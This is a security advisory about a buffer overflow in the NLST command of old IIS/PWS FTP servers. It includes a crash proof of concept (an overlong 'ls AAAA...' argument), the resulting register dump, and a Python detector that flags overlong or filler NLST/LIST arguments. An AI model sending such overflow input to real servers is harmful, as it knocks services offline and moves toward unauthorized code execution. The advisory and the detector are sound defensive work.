Release date: 2000-9-9
Last updated: 2000-9-9
Affected systems:
Windows NT 4.0 (SP4) IIS 3.0 / 4.0
Windows 95/98 PWS 1.0
Description:
The NLST command of the IIS FTP server has a buffer overflow vulnerability. It may allow an attacker to run an unauthorized command on the server; if the overflow address is wrong, it may instead crash the server.
Test method:
Client-side input:
C:\>ftp guilt.xyz.com
Connected to guilt.xyz.com.
220 GUILT Microsoft FTP Service (Version 4.0).
User (marc.xyz.com:(none)): ftp
331 Anonymous Access allowed, send identity (e-mail name) as password.
Password:
230 Anonymous user logged in.
ftp> ls AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAA
200 PORT command successful.
150 Opening ASCII mode data connection for file list
(the server has gone down)
Server-side response:
The instruction at '0x710f8aa2' referenced memory at '0x41414156'
EAX = 0000005C EBX = 00000001
ECX = 00D3F978 EDX = 002582DD
ESI = 00D3F978 EDI = 00000000
EIP = 710F8AA2 ESP = 00D3F644
EBP = 00D3F9F0 EFL = 00000206
Through repeated debugging and testing, the exact overflow address on the server can be determined, and from there an unauthorized command can be executed on the server.
Recommendation:
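As an added detection example (not part of this advisory), the Python below scans FTP control-channel command lines, as a server log or network sensor would record them, and flags NLST/LIST arguments that are overlong or filled with one repeated byte; the client's `ls` in the transcript above is sent on the wire as NLST, and the advisory's filler byte 'A' (0x41) is why the faulting address 0x41414156 is built from 'A's. The 255-byte threshold, the 64-byte repeat run and the sample lines are constructed assumptions, not values from the advisory.

```python
import re

# Constructed sample of FTP control-channel commands as seen server-side
# (not taken from the advisory).
SAMPLE_COMMANDS = [
    "USER ftp",
    "PASS guest@",
    "PORT 10,0,0,5,4,1",
    "NLST " + "A" * 300,        # overlong path argument, like the advisory's ls AAAA...
    "NLST pub",
    "LIST -la " + "B" * 512,    # same family of command, also overlong
    "NLST " + "C" * 100,        # short enough, but a single repeated byte
    "STOR readme.txt",
    "QUIT",
]

# Commands that take a path argument; the advisory's overflow is in NLST.
PATH_COMMANDS = {"NLST", "LIST"}
MAX_ARG_LEN = 255          # assumed threshold (MAX_PATH-sized); tune per environment
REPEAT_RUN = re.compile(r"(.)\1{63,}")   # 64+ copies of one byte, a typical filler pattern


def parse_command(line):
    """Split one FTP control line into (VERB, argument); argument may be empty."""
    line = line.rstrip("\r\n")
    verb, _, arg = line.partition(" ")
    return verb.upper(), arg


def is_suspicious(line, max_len=MAX_ARG_LEN):
    """True when a path-taking command carries an overlong or filler-style argument."""
    verb, arg = parse_command(line)
    if verb not in PATH_COMMANDS:
        return False
    if len(arg) > max_len:
        return True
    return REPEAT_RUN.search(arg) is not None


def scan(lines, max_len=MAX_ARG_LEN):
    """Return (index, VERB, argument_length) for every suspicious command line."""
    hits = []
    for i, line in enumerate(lines):
        if is_suspicious(line, max_len):
            verb, arg = parse_command(line)
            hits.append((i, verb, len(arg)))
    return hits


if __name__ == "__main__":
    for idx, verb, n in scan(SAMPLE_COMMANDS):
        print(f"line {idx}: {verb} with {n}-byte argument")
```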